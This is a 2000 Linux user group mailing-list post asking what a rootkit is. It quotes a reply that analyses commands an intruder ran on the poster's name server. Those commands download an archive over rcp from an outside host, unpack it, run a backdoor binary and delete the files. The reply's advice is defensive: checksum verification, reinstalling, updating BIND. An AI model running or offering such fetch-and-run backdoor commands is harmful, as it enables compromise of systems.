[lug] What does this mean?

nunar at mauromedia.net nunar at mauromedia.net
Tue Mar 21 00:41:41 MST 2000 

What exactly is a rootkit?


> ** Original Subject: RE: [lug] What does this mean?
> ** Original Sender: Tkil <tkil at scrye.com>
> ** Original Date: Tue, 21 Mar 2000 00:34:12 -0700

> ** Original Message follows... 

>
> >>>>> "Shannon" == nunar  <nunar at mauromedia.net> writes:
> 
> [reformatted for sanity]
> 
> Shannon> I was going through my name server and somebody had entered this:
> Shannon> #   cd /tmp; \
> Shannon> 	rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
> Shannon> 	echo "* downloaded "; \
> Shannon> 	tar xfz ak*; \
> Shannon> 	cd ak; \
> Shannon> 	./backdoor/ls; \
> Shannon> 	cd ..; \
> Shannon> 	rm -rf ak*; \
> Shannon> 	exit
> 
> note that the only line which actually looks dangerous is the
> "./backdoor/ls" one; everything else should be pretty polite.
> (although, if they already have root... ouch.)
> 
> Shannon> Does anybody know what this is doing to my system?
> 
> short version: someone tried to run a rootkit against your box.  i
> can't tell offhand whether or not they succeeded, but you should
> probably "rm -rf /tmp/backup" at the very least.
> 
> jafo says:  if you are running redhat, check the MD5 sums of all the
> packages on the box (this is an option to 'rpm'; consult the man page,
> but"--verify" should be close...)
> 
> jafo also says:  consult the most excellent linux security howto.  (hi
> kev!)  accessable at:
> 
>    http://www.tummy.com/security-howto/
> 
> prepare to do a backup of important data (e.g. your named config
> files) and possibly do a full reinstall.  be absolutely sure you are
> running the latest versions of named and friends (BIND-*).  also,
> don't do a blind copy of the named config files; double-check that
> nobody is using your server who shouldn't be.
> 
> t.
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

>** --------- End Original Message ----------- **

> 



Download NeoPlanet at http://www.neoplanet.com

More information about the LUG mailing list